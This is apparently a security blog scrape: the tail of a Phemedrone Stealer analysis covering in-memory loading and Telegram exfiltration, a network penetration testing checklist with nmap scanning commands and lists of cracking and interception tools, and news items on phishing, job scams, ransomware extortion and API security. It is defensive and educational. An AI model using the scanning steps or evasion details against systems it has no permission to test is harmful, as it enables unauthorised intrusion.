    • Application Domain Creation: Creates a new Application Domain, allowing assemblies to run in disposable AppDomains.
    • Assembly Loading and Execution: Once the AppDomain is prepared, Donut loads the .NET assembly and invokes the payload’s entry point.

The use of Donut in this attack is particularly notable for its ability to execute various types of code directly in memory. This method greatly reduces the attack’s visibility to traditional security measures, as it leaves minimal traces on the filesystem. Additionally, the use of memory-only execution tactics, coupled with sophisticated encryption, makes the payload difficult to detect and analyze. The ability to create and use disposable AppDomains further enhances evasion by isolating the execution environment, reducing the chances of detection by runtime monitoring tools. This approach demonstrates a high level of sophistication in evading defenses and executing the final payload stealthily.

PHEMEDRONE STEALER PAYLOAD ANALYSIS

Phemedrone Stealer initializes its configuration and decrypts items like Telegram API tokens using the RijndaelManaged symmetric encryption algorithm. It targets a wide range of applications to extract sensitive information, including Chromium-based browsers, crypto wallets, Discord, FileGrabber, FileZilla, Gecko-based browsers, system information, Steam, and Telegram.

COMMAND AND CONTROL FOR DATA EXFILTRATION

After data collection, the malware compresses the information into a ZIP file and validates the Telegram API token before exfiltrating the data. It sends system information and statistics to the attacker via the Telegram API. Despite the patch for CVE-2023-36025, threat actors continue to exploit this vulnerability to evade Windows Defender SmartScreen protection. The Phemedrone Stealer campaign highlights the need for vigilance and updated security measures against such evolving cyber threats.

MITIGATION

Mitigating the risks associated with CVE-2023-36025 and similar vulnerabilities, especially in the context of the Phemedrone Stealer campaign, involves a multi-layered approach. Here are some key strategies:

  1. Apply Security Patches: Ensure that all systems are updated with the latest security patches from Microsoft, particularly the one addressing CVE-2023-36025. Regularly updating software can prevent attackers from exploiting known vulnerabilities.
  2. Enhance Endpoint Protection: Utilize advanced endpoint protection solutions that can detect and block sophisticated malware like Phemedrone Stealer. These solutions should include behavior-based detection to identify malicious activities.
  3. Educate Users: Conduct security awareness training for all users. Educate them about the dangers of clicking on unknown links, opening suspicious email attachments, and the risks of downloading files from untrusted sources.
  4. Implement Network Security Measures: Use firewalls, intrusion detection systems, and intrusion prevention systems to monitor and control network traffic based on an applied set of security rules.
  5. Secure Email Gateways: Deploy email security solutions that can scan and filter out malicious emails, which are often the starting point for malware infections.
  6. Regular Backups: Regularly back up data and ensure that backup copies are stored securely. In case of a malware infection, having up-to-date backups can prevent data loss.
  7. Use Application Whitelisting: Control which applications are allowed to run on your network. This can prevent unauthorized applications, including malware, from executing.
  8. Monitor and Analyze Logs: Regularly review system and application logs for unusual activities that might indicate a breach or an attempt to exploit vulnerabilities.
  9. Restrict User Privileges: Apply the principle of least privilege by limiting user access rights to only those necessary for their job functions. This can reduce the impact of a successful attack.
  10. Incident Response Plan: Have a well-defined incident response plan in place. This should include procedures for responding to a security breach and mitigating its impact.
  11. Use Secure Web Gateways: Deploy web gateways that can detect and block access to malicious websites, thereby preventing the download of harmful content.
  12. Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and address potential security gaps in the network.

By implementing these measures, organizations can significantly reduce their risk of falling victim to malware campaigns that exploit vulnerabilities like CVE-2023-36025.


Learn Malware Removal Techniques: How to remove malwares from a computer


Tags: DEFENDER ANTIVIRUS


Jan 15 2024

Network Penetration Testing Checklist – 2024

Category: Pen Test | disc7 @ 9:18 am

A network penetration testing checklist identifies vulnerabilities in the network posture by discovering open ports, probing live systems and services, and grabbing system banners.

Pen testing helps the administrator close unused ports, add additional services, hide or customize banners, troubleshoot services, and calibrate firewall rules.

Test every avenue to ensure that no security loophole remains.

Network penetration testing, also known as ethical hacking or white-hat hacking, is a systematic process of evaluating the security of a computer network infrastructure.

The goal of a network penetration test is to identify vulnerabilities and weaknesses in the network’s defenses that malicious actors could potentially exploit.

Network penetration testing is a critical process for evaluating the security of a computer network by simulating an attack from malicious outsiders or insiders. Here is a comprehensive checklist for conducting network penetration testing:

Pre-Engagement Activities

  1. Define Scope: Clearly define the scope of the test, including which networks, systems, and applications will be assessed.
  2. Get Authorization: Obtain written permission from the organization’s management to conduct the test.
  3. Legal Considerations: Ensure compliance with all relevant laws and regulations.
  4. Set Objectives: Establish what the penetration test aims to achieve (e.g., identifying vulnerabilities, testing incident response capabilities).
  5. Plan and Schedule: Develop a testing schedule that minimizes impact on normal operations.

Reconnaissance

  1. Gather Intelligence: Collect publicly available information about the target network (e.g., via WHOIS, DNS records).
  2. Network Mapping: Identify the network structure, IP ranges, domain names, and accessible systems.
  3. Identify Targets: Pinpoint specific devices, services, and applications to target during the test.

Threat Modeling

  1. Identify Potential Threats: Consider possible threat actors and their capabilities, objectives, and methods.
  2. Assess Vulnerabilities: Evaluate which parts of the network might be vulnerable to attack.

Vulnerability Analysis

  1. Automated Scanning: Use tools to scan for known vulnerabilities (e.g., Nessus, OpenVAS).
  2. Manual Testing Techniques: Perform manual checks to complement automated tools.
  3. Document Findings: Keep detailed records of identified vulnerabilities.

Exploitation

  1. Attempt Exploits: Safely attempt to exploit identified vulnerabilities to gauge their impact.
  2. Privilege Escalation: Test if higher levels of access can be achieved.
  3. Lateral Movement: Assess the ability to move across the network from the initial foothold.

Post-Exploitation

  1. Data Access and Exfiltration: Evaluate what data can be accessed or extracted.
  2. Persistence: Check if long-term access to the network can be maintained.
  3. Cleanup: Remove any tools or scripts installed during the testing.

Analysis and Reporting

  1. Compile Findings: Gather all data, logs, and evidence.
  2. Risk Assessment: Analyze the risks associated with the identified vulnerabilities.
  3. Develop Recommendations: Propose measures to mitigate or eliminate vulnerabilities.
  4. Prepare Report: Create a detailed report outlining findings, risks, and recommendations.

Review and Feedback

  1. Present Findings: Share the report with relevant stakeholders.
  2. Discuss Remediation Strategies: Work with the IT team to discuss ways to address vulnerabilities.
  3. Plan for Re-Testing: Schedule follow-up tests to ensure vulnerabilities are effectively addressed.

Continuous Improvement

  1. Update Security Measures: Implement the recommended security enhancements.
  2. Monitor for New Vulnerabilities: Regularly scan and test the network as new threats emerge.
  3. Educate Staff: Train staff on new threats and security best practices.

Tools and Techniques

  1. Select Tools: Choose appropriate tools for scanning, exploitation, and analysis (e.g., Metasploit, Wireshark, Burp Suite).
  2. Custom Scripts and Tools: Sometimes custom scripts or tools are required for specific environments or systems.

Ethical and Professional Conduct

  1. Maintain Confidentiality: All findings should be kept confidential and shared only with authorized personnel.
  2. Professionalism: Conduct all testing with professionalism, ensuring no unnecessary harm is done to the systems.

Post-Engagement Activities

  1. Debrief Meeting: Conduct a meeting with the stakeholders to discuss the findings and next steps.
  2. Follow-Up Support: Provide support to the organization in addressing the vulnerabilities.

Documentation and Reporting

  1. Detailed Documentation: Ensure that every step of the penetration test is well-documented.
  2. Clear and Actionable Reporting: The final report should be understandable to both technical and non-technical stakeholders and provide actionable recommendations.

Compliance and Standards

  1. Adhere to Standards: Follow industry standards and best practices (e.g., OWASP, NIST).
  2. Regulatory Compliance: Ensure the testing process complies with relevant industry regulations (e.g., HIPAA, PCI-DSS).

Final Steps

  1. Validation of Fixes: Re-test to ensure vulnerabilities have been properly addressed.
  2. Lessons Learned: Analyze the process for any lessons that can be learned and applied to future tests.

Awareness and Training

  1. Organizational Awareness: Increase awareness about network security within the organization.
  2. Training: Provide training to staff on recognizing and preventing security threats.

By following this checklist, organizations can conduct thorough and effective network penetration tests, identifying vulnerabilities and strengthening their network security posture.

Let’s see how we conduct step-by-step Network penetration testing using famous network scanners.

1. Host Discovery

Footprinting is the first and most important phase where one gathers information about their target system.

DNS footprinting helps to enumerate the DNS records (A, MX, NS, SRV, PTR, SOA, and CNAME) associated with the target domain.

  • A – An A record points a domain name such as gbhackers.com to the IP address of its hosting server.
  • MX – MX records identify the mail servers responsible for email exchange.
  • NS – NS records identify the DNS servers authoritative for the domain.
  • SRV – SRV records identify the servers hosting a specific service.
  • PTR – PTR records provide reverse DNS lookup; given an IP address you can get the domains associated with it.
  • SOA – The Start of Authority record holds the DNS zone’s administrative information and relates to the other records in the zone.
  • CNAME – A CNAME record maps a domain name (alias) to another domain name.

We can detect live and accessible hosts in the target network by using network scanning tools such as Advanced IP Scanner, Nmap, hping3, and Nessus.

Ping & Ping Sweep:

  • root@kali:~# nmap -sn 192.168.169.128 (single host)
  • root@kali:~# nmap -sn 192.168.169.128-20 (range of IPs)
  • root@kali:~# nmap -sn 192.168.169.* (wildcard)
  • root@kali:~# nmap -sn 192.168.169.128/24 (entire subnet)

Whois Information 

To obtain Whois information and the name server of a website

root@kali:~# whois testdomain.com

  1. http://whois.domaintools.com/
  2. https://whois.icann.org/en

Traceroute

Traceroute is a network diagnostic tool that displays the route path and the transit delays of packets.

root@kali:~# traceroute google.com

Online Tools

  1. http://www.monitis.com/traceroute/
  2. http://ping.eu/traceroute/

2. Port Scanning

Perform port scanning using Nmap, Hping3, Netscan tools, and Network monitor. These tools help us probe a server or host on the target network for open ports.

Open ports allow attackers to enter and install malicious backdoor applications.

  • root@kali:~# nmap --open gbhackers.com (find all open ports)
  • root@kali:~# nmap -p 80 192.168.169.128 (specific port)
  • root@kali:~# nmap -p 80-200 192.168.169.128 (range of ports)
  • root@kali:~# nmap -p "*" 192.168.169.128 (all ports)

Online Tools

  1. http://www.yougetsignal.com/
  2. https://pentest-tools.com/information-gathering/find-subdomains-of-domain
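To carry the port-scan results into the "document all findings" step, here is an added Python example (not from the original checklist) that parses Nmap grepable output (-oG) and reports open ports that are absent from an approved-services baseline, so unused ports can be closed as the checklist recommends. The scan output, the hosts and the baseline are constructed sample data.

```python
"""Compare Nmap grepable (-oG) results with an approved-port baseline (constructed example)."""
from dataclasses import dataclass

# Constructed -oG output, as produced by e.g. nmap -sV -oG scan.gnmap 192.168.169.128-129
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.169.128 ()\tStatus: Up
Host: 192.168.169.128 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 4444/open/tcp//krb524///\tIgnored State: closed (997)
Host: 192.168.169.129 ()\tStatus: Up
Host: 192.168.169.129 ()\tPorts: 443/open/tcp//https//nginx 1.18.0/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (998)
# Nmap done (constructed sample)
"""

# Approved (protocol, port) pairs per host, maintained by the administrator.
BASELINE = {
    "192.168.169.128": {("tcp", 22), ("tcp", 80)},
    "192.168.169.129": {("tcp", 443)},
}


@dataclass(frozen=True)
class PortFinding:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_gnmap(text: str) -> list[PortFinding]:
    """Parse the 'Ports:' records of Nmap grepable output into PortFinding objects.

    Each port entry has seven slash-separated fields:
    number/state/protocol/owner/service/rpcinfo/version.
    """
    findings = []
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = line.split("\t")          # Host / Ports / Ignored State are tab-separated
        host = fields[0].split()[1]
        ports_field = next((f for f in fields if f.startswith("Ports: ")), None)
        if ports_field is None:           # 'Status: Up' lines carry no port data
            continue
        for entry in ports_field[len("Ports: "):].split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            number, state, proto, _owner, service, _rpc, version = parts[:7]
            findings.append(PortFinding(host, int(number), proto, state, service, version))
    return findings


def unexpected_open_ports(findings: list[PortFinding], baseline: dict) -> list[PortFinding]:
    """Open ports not in the host's approved set; hosts missing from the baseline count as unapproved."""
    return [f for f in findings
            if f.state == "open" and (f.proto, f.port) not in baseline.get(f.host, set())]


if __name__ == "__main__":
    for f in unexpected_open_ports(parse_gnmap(SAMPLE_GNMAP), BASELINE):
        print(f"{f.host}:{f.port}/{f.proto} ({f.service} {f.version}) is open but not approved")
```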

3. Banner Grabbing/OS Fingerprinting

Perform banner grabbing or OS fingerprinting using tools such as Telnet, IDServe, and Nmap to determine the operating system of the target host.

Once you know the version and operating system of the target, you need to find its vulnerabilities and exploit them in an attempt to gain control over the system.

root@kali:~# nmap -A 192.168.169.128
root@kali:~# nmap -v -A 192.168.169.128 (with a higher verbosity level)

IDServe is another good tool for banner grabbing.

Online Tools

  1. https://www.netcraft.com/
  2. https://w3dt.net/tools/httprecon
  3. https://www.shodan.io/

4. Scan For Vulnerabilities

Scan the network for vulnerabilities using GFI LanGuard, Nessus, Retina CS, or SAINT.

These tools help us find vulnerabilities in the target system and operating systems. With these steps, you can find loopholes in the target network system.

GFI LanGuard

It acts as a security consultant and offers patch management, vulnerability assessment, and network auditing services.

Nessus

Nessus is a vulnerability scanner that searches for bugs in software and identifies specific ways to violate the security of a software product. A Nessus scan proceeds through the following stages:

  • Data gathering.
  • Host identification.
  • Port scan.
  • Plug-in selection.
  • Reporting of data.

5. Draw Network Diagrams

Draw a network diagram about the organization that helps you to understand the logical connection path to the target host in the network.

The network diagram can be drawn with LANmanager, LANstate, Friendly Pinger, or Network View.

6. Prepare Proxies

Proxies act as an intermediary between two networking devices. A proxy can protect the local network from outside access.

With proxy servers, we can anonymize web browsing and filter unwanted content, such as ads.

Proxies such as Proxifier, SSL Proxy, and Proxy Finder are used to keep the tester’s origin from being detected.

7. Document All Findings

The last and very important step is to document all the findings from penetration testing.

This document will help you find potential vulnerabilities in your network. Once you determine the vulnerabilities, you can plan counteractions accordingly.

You can download the rules and scope Worksheet here – Rules and Scope sheet 

Thus, penetration testing helps assess your network before it gets into real trouble that may cause severe loss in value and finance.

Important Tools Used For Network Pentesting

Frameworks

Kali Linux, Backtrack5 R3, Security Onion

Reconnaissance

Smartwhois, MxToolbox, CentralOps, dnsstuff, nslookup, DIG, netcraft

Discovery

Angry IP Scanner, Colasoft Ping Tool, nmap, Maltego, NetResident, LanSurveyor, OpManager

Port Scanning

Nmap, Megaping, Hping3, Netscan Tools Pro, Advanced Port Scanner

Service Fingerprinting

Xprobe, nmap, zenmap

Enumeration

Superscan, Netbios enumerator, Snmpcheck, onesixtyone, Jxplorer, Hyena, DumpSec, WinFingerprint, Ps Tools, NsAuditor, Enum4Linux, nslookup, Netscan

Scanning

Nessus, GFI Languard, Retina, SAINT, Nexpose

Password Cracking

Ncrack, Cain & Abel, LC5, Ophcrack, pwdump7, fgdump, John the Ripper, RainbowCrack

Sniffing

Wireshark, Ettercap, Capsa Network Analyzer

MiTM Attacks

Cain & Abel, Ettercap

Exploitation

Metasploit, Core Impact

Concentrate on these most important checklist items when conducting network penetration testing.

Network Penetration Testing with Nmap


Tags: Network Penetration Testing, Network Penetration Testing with Nmap


Jan 12 2024

Framework discloses data breach after accountant gets phished

Category: Data Breach, Phishing | disc7 @ 10:21 am

https://www.bleepingcomputer.com/news/security/framework-discloses-data-breach-after-accountant-gets-phished/

Framework Computer disclosed a data breach exposing the personal information of an undisclosed number of customers after Keating Consulting Group, its accounting service provider, fell victim to a phishing attack.

The California-based manufacturer of upgradeable and modular laptops says a Keating Consulting accountant was tricked on January 11 by a threat actor impersonating Framework’s CEO into sharing a spreadsheet containing customers’ personally identifiable information (PII) “associated with outstanding balances for Framework purchases.”

“On January 9th, at 4:27am PST, the attacker sent an email to the accountant impersonating our CEO asking for Accounts Receivable information pertaining to outstanding balances for Framework purchases,” the company says in data breach notification letters sent to affected individuals.

“On January 11th at 8:13am PST, the accountant responded to the attacker and provided a spreadsheet with the following information: Full Name, Email Address, Balance Owed.

“Note that this list was primarily of a subset of open pre-orders, but some completed past orders with pending accounting syncs were also included in this list.”

Framework says its Head of Finance notified Keating Consulting’s leadership of the attack once he became aware of the breach roughly 29 minutes after the external accountant replied to the attacker’s emails at 8:42 AM PST on January 11th.

As part of a subsequent investigation, the company identified all customers whose information was exposed in the attack and notified them of the incident via email.

Affected customers warned of phishing risks

Since the exposed data includes the names of customers, their email addresses, and their outstanding balances, it could potentially be used in phishing attacks that impersonate the company to request payment information or redirect to malicious websites designed to gather even more sensitive information from those impacted.

The company added that it only sends emails from ‘support@frame.work’ asking customers to update their information when a payment has failed and it never asks for payment information via email. Customers are urged to contact the company’s support team about any suspicious emails they receive.

Framework says that from now on, all Keating Consulting employees with access to Framework customer information will be required to have mandatory phishing and social engineering attack training.

“We are also auditing their standard operating procedures around information requests,” the company added.

“We are additionally auditing the trainings and standard operating procedures of all other accounting and finance consultants who currently or previously have had access to customer information.”

A Framework spokesperson was not immediately available for comment when BleepingComputer asked about the number of affected customers in the data breach.

Big Breaches: Cybersecurity Lessons for Everyone 


Tags: data breach


Jan 12 2024

Fake Recruiters Defraud Facebook Users via Remote-Work Offers

Category: Information Security | disc7 @ 8:56 am

Scammers are targeting multiple brands with “job offers” on Meta’s social media platform that go as far as to offer what look like legitimate job contracts to victims.

https://www.darkreading.com/remote-workforce/fake-recruiters-defraud-facebook-users-remote-work-offers

A fresh wave of job scams is spreading on Meta’s Facebook platform that aims to lure users with offers for remote-home positions and ultimately defraud them by stealing their personal data and banking credentials.

Researchers from Qualys are warning of “ongoing attacks against multiple brands” offering remote work through Facebook ads that go so far as to send what look like legitimate work contracts to victims, according to a blog post published Jan. 10 by Jonathan Trull, Qualys CISO and senior vice president of solutions architecture.

The attackers dangle offers of work-at-home opportunities to lure Facebook users to install or move to a popular chat app with someone impersonating a legitimate recruiter to continue the conversation. Eventually, attackers ask for personal information and credentials that potentially can allow attackers to defraud them in the future.

Likely aiming to take advantage of people’s tendency to make resolutions in the new year, these fake job ads — a persistent online threat — typically “see a rise in prevalence following the holidays” when people are primed for new opportunities, Trull wrote.

Qualys Caught Up in Scam

The researchers discovered the scams because fake recruiters were purporting to be from Qualys with offers of remote work. The company, however, never posts its job listings on social media, only on its own website and reputable employment sites, Trull said.

The initial text lures for the scam occur in group chats that solicit users to move to private messaging with the scammer who posts the job opening. “In several cases, the scammer appears to have compromised legitimate Facebook users and then targeted their direct connections,” Trull wrote.

Once a victim installs Go Chat or Signal — the messaging apps used in the scam — attackers ask for additional details so they can receive and sign what appears to be an official Qualys job offer complete with logos, correct corporate addresses, and signature lines.

Attackers then ask victims to send a copy of a government-issued photo ID, both front and back, and tell them to digitally cash a check to buy software for a new computer that their new employer will ship to them.

Qualys has notified both Facebook and law enforcement of the scam and encourages users to do the same if they observe it on the platform. The blog post did not list the names of other companies or brands that might also be targeted in the attacks.

Avoid Being Scammed

Job scams are indeed a constant online security issue, and one that’s on the rise, according to the US Better Business Bureau (BBB). Online ads and phishing campaigns are popular conduits for job scammers, who use social engineering to bait people into responding and then steal their personal data, online credentials, and/or money. Scams can also have a negative reputational impact on the companies whose brands are used in the scam.

To avoid being scammed by a fake job listing, Qualys provided some best practices for online employment seekers to follow when using the Internet to search for opportunities.

In general, a mindset of “if it’s too good to be true, it probably is” is a good rule of thumb to approaching online job listings, Trull wrote. “Listen to your intuition,” he added. “If it doesn’t feel right, you should probably not proceed.”

Qualys also advised that people always verify offers by looking up a job opening on an organization’s official website and contacting the company directly instead of using social media contacts that could be abused as part of a scam.

People also should be “highly skeptical” of any job solicitation that doesn’t come from an official source, even if the social media source making the offer appears trusted. Since social media accounts can be hijacked, the source can appear legitimate but isn’t.

Further, if an online recruiter asks a person to install an app to apply for a position, it’s probably a scam, Trull warned. “Real recruiters will call you, email, or set up a multimedia interview call at their expense without any concern — they are set up for it if they are a recruiter,” he wrote.

Fake: Fake Money



Tags: Fake Money, Fake Recuriter


Jan 11 2024

INSIDE THE SCAM: HOW RANSOMWARE GANGS FOOL YOU WITH DATA DELETION LIES!

Category: Ransomware | disc7 @ 2:29 pm

Recently, there has been an emergence of a new scam targeting victims of ransomware attacks. This scam involves individuals or groups posing as “security researchers” or “ethical hackers,” offering to delete data stolen by ransomware attackers for a fee. The scam plays on the fears and vulnerabilities of organizations already compromised by ransomware attacks, such as those by the Royal and Akira ransomware gangs.

The modus operandi of these scammers is quite consistent and alarming. They approach organizations that have already been victimized by ransomware and offer a service to hack into the servers of the ransomware groups and delete the stolen data. This proposition typically comes with a significant fee, sometimes in the range of 1-5 Bitcoins (which could amount to about $190,000 to $220,000).

These scammers often use platforms like Tox Chat to communicate with their targets and may go by names like “Ethical Side Group” or use monikers such as “xanonymoux.” They tend to provide “proof” of access to the stolen data, which they claim is still on the attacker’s servers. In some instances, they accurately report the amount of data exfiltrated, giving their claims an air of credibility.

A notable aspect of this scam is that it adds an additional layer of extortion to the victims of ransomware. Not only do these victims have to contend with the initial ransomware attack and the associated costs, but they are also faced with the prospect of paying yet another party to ensure the safety of their data. This situation highlights the complexities and evolving nature of cyber threats, particularly in the context of ransomware.

Security experts and researchers, like those from Arctic Wolf, have observed and reported on these incidents, noting the similarities in the tactics and communication styles used by the scammers in different cases. However, there remains a great deal of uncertainty regarding the actual ability of these scammers to delete the stolen data, and their true intentions.

THE EMERGING SCAM IN RANSOMWARE ATTACKS

1. THE FALSE PROMISE OF DATA DELETION

  • Ransomware gangs have been known not to always delete stolen data even after receiving payment. Victims are often misled into believing that paying the ransom will result in the deletion of their stolen data. However, there have been numerous instances where this has not been the case, leading to further exploitation.

2. FAKE ‘SECURITY RESEARCHER’ SCAMS

  • A new scam involves individuals posing as security researchers, offering services to recover or delete exfiltrated data for a fee. These scammers target ransomware victims, often demanding payment in Bitcoin. This tactic adds another layer of deception and financial loss for the victims.

3. THE HACK-BACK OFFERS

  • Ransomware victims are now being targeted by fake hack-back offers. These offers promise to delete stolen victim data but are essentially scams designed to extort more money from the victims. This trend highlights the evolving nature of cyber threats and the need for greater awareness.

4. THE ILLOGICAL NATURE OF PAYING FOR DATA DELETION

  • Paying to delete stolen data is considered an illogical and ineffective strategy. Once data is stolen, there is no guarantee that the cybercriminals will honor their word. The article argues that paying the ransom often leads to more harm than good.

5. THE ROLE OF RANSOMWARE GROUPS

  • Some ransomware groups are involved in offering services to delete exfiltrated data for a fee. However, these offers are often scams, and there is no assurance that the data will be deleted after payment.

These scams underscore the critical importance of cybersecurity vigilance and the need for robust security measures to protect against ransomware and related cyber threats. They also highlight the difficult decisions facing organizations that fall victim to ransomware: whether to pay the ransom, how to handle stolen data, and how to respond to subsequent extortion attempts.

The Ransomware Hunting Team: A Band of Misfits’ Improbable Crusade to Save the World from Cybercrime


Tags: ransomware attacks


Jan 11 2024

APIs are increasingly becoming attractive targets

Category: API security | disc7 @ 10:35 am

APIs power the digital world—our phones, smartwatches, banking systems and shopping sites all rely on APIs to communicate. They can help ecommerce sites accept payments, enable healthcare systems to securely share patient data, and even give taxis and public transportation access to real-time traffic data.

Nearly every business today now uses them to build and provide better sites, apps and services to consumers. However, if unmanaged or unsecured, APIs present a goldmine for threat actors to exfiltrate potentially sensitive information.

“APIs are central to how applications and websites work, which makes them a rich, and relatively new, target for hackers,” said Matthew Prince, CEO at Cloudflare. “It’s vital that companies identify and protect all their APIs to prevent data breaches and secure their businesses.”

APIs’ popularity boosts attack volume

The seamless integrations that APIs allow for have driven organizations across industries to increasingly leverage them – some more quickly than others. The IoT, rail, bus and taxi, legal services, multimedia and games, and logistics and supply chain industries saw the highest share of API traffic in 2023.

APIs dominate dynamic Internet traffic around the globe (57%), with each region that Cloudflare protects seeing an increase in usage over the past year. However, the top regions that explosively adopted APIs and witnessed the highest traffic share in 2023 were Africa and Asia.

As with any popular business critical function that houses sensitive data, threat actors attempt to exploit any means necessary to gain access. The rise in popularity of APIs has also caused a rise in attack volume, with HTTP Anomaly, Injection attacks and file inclusion being the top three most commonly used attack types mitigated by Cloudflare.

Shadow APIs provide a defenseless path for threat actors

Organizations struggle to protect what they cannot see. Nearly 31% more REST API endpoints (the individual paths through which an API is called) were discovered through machine learning than were listed in customer-provided identifiers, i.e., organizations lack a full inventory of their APIs.

Regardless of whether an organization has full visibility of all its APIs, DDoS mitigation solutions can help block potential threats: 33% of all mitigations applied to API threats were blocked by DDoS protections already in place.
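The inventory gap described above, as an added example that is not from the Cloudflare report or this post: a small Python check that derives the API endpoints actually observed in a web server access log, collapses identifier-like path segments to a placeholder, and reports any method/path pair missing from the declared inventory. The declared inventory, the log lines and the paths are constructed for illustration.

```python
import re
from collections import Counter

# Constructed inventory: the endpoints the organisation *says* it exposes (hypothetical).
DECLARED_ENDPOINTS = {
    ("GET", "/api/v1/users/{id}"),
    ("POST", "/api/v1/orders"),
    ("GET", "/api/v1/orders/{id}"),
}

# Constructed access-log sample in common log format (fabricated for this example).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2024:10:35:01 +0000] "GET /api/v1/users/1042 HTTP/1.1" 200 512
203.0.113.7 - - [11/Jan/2024:10:35:02 +0000] "POST /api/v1/orders HTTP/1.1" 201 88
198.51.100.4 - - [11/Jan/2024:10:35:03 +0000] "GET /api/v1/orders/77?expand=items HTTP/1.1" 200 2048
198.51.100.4 - - [11/Jan/2024:10:35:04 +0000] "GET /api/v2/users/1042/export HTTP/1.1" 200 90112
192.0.2.9 - - [11/Jan/2024:10:35:05 +0000] "DELETE /api/v1/users/1042 HTTP/1.1" 204 0
192.0.2.9 - - [11/Jan/2024:10:35:06 +0000] "GET /static/app.js HTTP/1.1" 200 40000
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Path segments that look like identifiers (decimal numbers, UUIDs, long hex) become {id}.
ID_SEGMENT = re.compile(r"^(\d+|[0-9a-fA-F-]{16,})$")

def normalize_path(path: str) -> str:
    """Drop the query string and collapse identifier-like segments so /users/1042 == /users/{id}."""
    path = path.split("?", 1)[0]
    return "/".join("{id}" if ID_SEGMENT.match(seg) else seg for seg in path.split("/"))

def observed_endpoints(log_text: str, api_prefix: str = "/api/") -> Counter:
    """Map (method, normalized path) -> request count for API traffic seen in the log."""
    seen = Counter()
    for m in LOG_RE.finditer(log_text):
        path = normalize_path(m.group("path"))
        if path.startswith(api_prefix):  # ignore static assets and non-API routes
            seen[(m.group("method"), path)] += 1
    return seen

def shadow_endpoints(log_text: str, declared: set) -> dict:
    """Endpoints that real traffic reveals but the declared inventory does not list."""
    return {ep: n for ep, n in observed_endpoints(log_text).items() if ep not in declared}

def inventory_gap_percent(log_text: str, declared: set) -> float:
    """How many more endpoints traffic exposes than the inventory declares, as a percentage."""
    return 100.0 * len(shadow_endpoints(log_text, declared)) / len(declared)
```

On the constructed sample, two of the five endpoints seen in traffic (a v2 export route and a DELETE on users) are absent from the inventory, which is the kind of gap the report attributes to shadow APIs.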

“APIs are powerful tools for developers to create full-featured, complex applications to serve their customers, partners, and employees, but each API is a potential attack surface that needs to be secured,” said Melinda Marks, Practice Director, Cybersecurity, for Enterprise Strategy Group. “As this new report shows, organizations need more effective ways to address API security, including better visibility of APIs, ways to ensure secure authentication and authorization between connections, and better ways to protect their applications from attacks.”

API Security in Action


Tags: API Security

